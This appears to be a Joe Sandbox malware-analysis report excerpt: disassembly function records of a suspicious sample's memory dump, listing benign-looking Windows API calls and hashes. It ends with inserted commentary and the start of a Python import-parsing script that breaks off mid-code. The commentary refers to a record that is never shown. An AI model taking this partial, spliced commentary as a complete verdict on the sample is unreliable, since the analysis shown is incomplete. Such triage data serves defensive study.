                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 568898626-3772416878
                                                                                                      • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                                      • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                                      • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                                      • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                                                                      • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                                                      • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                                                                      • Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                                                      • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                                                                      • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                                                      • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                                                                      • Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                                                      • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 1177325624-0
                                                                                                      • Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                                                      • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                                                                      • Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                                                      • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004833FA
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$IconicLong
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754861897-0
                                                                                                      • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                                      • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                                                                      • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                                      • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                                                                      • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                                                      • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                                                                      • Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                                                      • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004241F4
                                                                                                      • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                                                                        • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                        • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,020725AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                                                                      • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 649377781-0
                                                                                                      • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                      • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                                                                      • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                      • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D1F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 568898626-0
                                                                                                      • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                                      • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                                      • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                                      • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureIconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 2277910766-0
                                                                                                      • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                                                      • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                                                                      • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                                                      • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004241AB
                                                                                                        • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                        • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                        • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                        • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                      • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                        • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2671590913-0
                                                                                                      • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                      • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                                      • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                      • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                                      • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                                                                      • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                                      • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                                      • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                                                                      • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                                      • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                                      • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                                                      • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                                      • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                                      • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                                                      • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                                      • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3288599744.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3288584758.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000001.00000002.3288619634.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10000000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                      • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3288599744.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3288584758.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000001.00000002.3288619634.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10000000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                      • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction Fuzzy Hash:
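The record that follows resolves several dozen uxtheme.dll exports by name at runtime through a single LoadLibraryA followed by a run of GetProcAddress calls; that call sequence is what the report flags as "Contains functionality to dynamically determine API calls". When triaging such records the useful question is not whether GetProcAddress appears, but which library and which exports were resolved. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses API lines in the report's rendered format (bullet, `Name.MODULE(args), ref: ADDR`, with the "Part of subcall function" prefix) from a constructed subset of the lines in this section, attributes every GetProcAddress to the most recent LoadLibrary (the report prints the module handle as 00000000 because it is not known statically), and checks the resolved export names against a small watchlist of unpacking and injection primitives. The watchlist contents and the `<unknown>` bucket for resolutions with no preceding LoadLibrary are this example's own assumptions. For this sample the resolved names are all theme-drawing exports, so the check returns nothing: here the dynamic resolution is ordinary GUI plumbing rather than evasion.

```python
"""Rebuild runtime-resolved imports from Joe Sandbox 'APIs' lines.

Added example; parses the report's API lines as rendered on the page
(bullet, Name.MODULE(args), ref: address). The watchlist and the
"<unknown>" bucket label are assumptions of this example.
"""
import re
from collections import OrderedDict

# Constructed input: API lines copied from function records in this report
# section, keeping the report's own bullets and subcall indentation.
SAMPLE_APIS = """\
• IsIconic.USER32(?), ref: 00417D1F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
  • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
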